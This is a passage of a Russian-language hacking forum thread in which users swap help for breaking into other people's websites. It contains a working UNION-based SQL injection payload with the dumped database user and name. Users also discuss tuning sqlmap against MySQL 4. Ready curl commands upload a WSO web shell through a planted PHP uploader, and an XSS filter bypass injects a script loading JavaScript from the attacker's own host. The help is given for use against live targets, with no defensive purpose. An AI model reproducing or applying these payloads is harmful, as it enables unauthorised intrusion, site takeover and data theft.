Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Посмотрите где расположена БД.


    Если есть данные от админки, то вполне получится.
     
    _________________________
  2. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Как это сделать? В сообщение об ошибке SQL данной информации нет.
    Code:
    Table 'db_name.table_name' doesn't exist SQL=INSERT INTO table_name ( id, info ) VALUES ( 1, 'data' and updatexml(1,concat(0x3a,version(),2) or '')
    
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    user() - если выпадет IP сравни его с IP сайта, в ином случае БД на серваке с сайтом.
     
    _________________________
  4. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Так user() не будет выполнен, т.к. mysql сервер сначала проверяет существование таблицы, в которую происходит вставка.
    Code:
    insert into non_existing_table(id, info) values(1,(select user()))
    // #1146 - Table 'data_base.non_existing_table' doesn't exist
    
    Может быть я не корректно задал вопрос. Уточню, что скорее всего таблица просто удалена, а не находится на другом сервере, но при этом есть уязвимый скрипт, который пытается обратиться к ней.
     
    #23564 int, 27 Sep 2014
    Last edited: 27 Sep 2014
  5. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Подскажите, в данном случае:
    Code:
    /about/news/1'/
    Возможно ли раскрутить SQL и добиться вывода инфы? Любым способом, error-based, blind, time-based и так далее.
    Все векторы перепробовал, никак не получается.
     
    #23565 Сбербанк, 28 Sep 2014
    Last edited: 28 Sep 2014
  6. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    А если version() заменить на user() или database(), то какой результат получим?
    Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии.
    Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.
     
    #23566 Сбербанк, 28 Sep 2014
    Last edited: 28 Sep 2014
  7. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?
    Code:
    /about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/
    :User: [email protected]
    Database: u74960
     
    1 person likes this.
  8. Сбербанк

    Сбербанк New Member

    Joined:
    30 Sep 2012
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    Спасибо большое! Не додумался до посылки сырых запросов. Выручил.
     
  9. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
    Mysql = 4.1
    пробовал добавлять --technique=B , --technique=T
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.

    Вывод - не заставишь. Для ветки 4.* такой технологии нет.
     
    _________________________
  11. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
    ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать :)
     
    _________________________
    1 person likes this.
  13. TIGERSSS

    TIGERSSS Banned

    Joined:
    25 Jan 2012
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    На сайт загружен php файл с таким содержимым:
    PHP:
    <?
      if (
    $_FILES['F1l3']) {
        
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
        echo 
    'OK';
      } else {
        echo 
    'You are forbidden!';
      }
    ?>
    Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.
     
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как:
    • Возможность доступа к ФС
    • Наличие таблицы с отладочной информацией
    • Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc)
    • etc

    PHP:
    curl -"F1l3=@/home/user/shell/wso2.php" -"Name=/var/www/wso2.php" http://site.com/file.php
     
    #23574 randman, 8 Oct 2014
    Last edited: 8 Oct 2014
  15. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Добрый день.

    Имеется сайт с XSS: http://site.com/?name=XSS_TEXT
    Html код этой страницы такой:
    Code:
    <html>
    <head>
      <script src="http://site.com/javascript-file.js?param=[COLOR=DarkOrange]XSS_TEXT[/COLOR]"></script>
    </head>
    <body>
    ...
    </body>
    <html>
    
    В свою очередь http://site.com/javascript-file.js?param=XSS_TEXT отдает вот что:
    Code:
    var  sss = {
      "param1" : 1,
      "param2" : {
        "param3" : 3,
        "param4" : "[COLOR=DarkOrange]XSS_TEXT[/COLOR]"
       }
    };
    
    Проблема в том что режется ' , ( , ) , scripts .
    Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:
    http://site.com/javascript-file.js?param="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"
    Code:
    var  sss = {
      "param1" : 1,
      "param2" : {
        "param3" : 3,
        "param4" : ""}};
    [COLOR=DarkOrange]document.head.childNodes[1].src="http://mysite.com/global.js";[/COLOR]
    var b={"1":{"1":""
       }
    };
    
    Fосле выполнения моего кода http://site.com/?name="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:
    Code:
    <html>
    <head>
      <script src="http://mysite.com/global.js"></script>
    </head>
    <body>
    ...
    </body>
    <html>
    

    src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)

    Спасибо :)
     
  16. TIGERSSS

    TIGERSSS Banned

    Joined:
    25 Jan 2012
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    А можно еще детальнее? :)
    Я ведь не введу в адресную строку браузера это?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    TIGERSSS,
    https://ru.wikipedia.org/wiki/CURL
     
    _________________________
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    TIGERSSS, Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.

    WendM, Строки можно представить в HEX-виде. Для выполнения можно использовать document.location и протокол javascript (не уверен, что схема заработает на всех современных браузерах).
     
    #23578 randman, 8 Oct 2014
    Last edited: 8 Oct 2014
  19. TIGERSSS

    TIGERSSS Banned

    Joined:
    25 Jan 2012
    Messages:
    0
    Likes Received:
    5
    Reputations:
    5
    Пример загрузки, или выполнения wso шелла с её помощью.
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php
    где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта.

    если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же
     
    _________________________
    #23580 yarbabin, 8 Oct 2014
    Last edited: 8 Oct 2014
Thread Status:
Not open for further replies.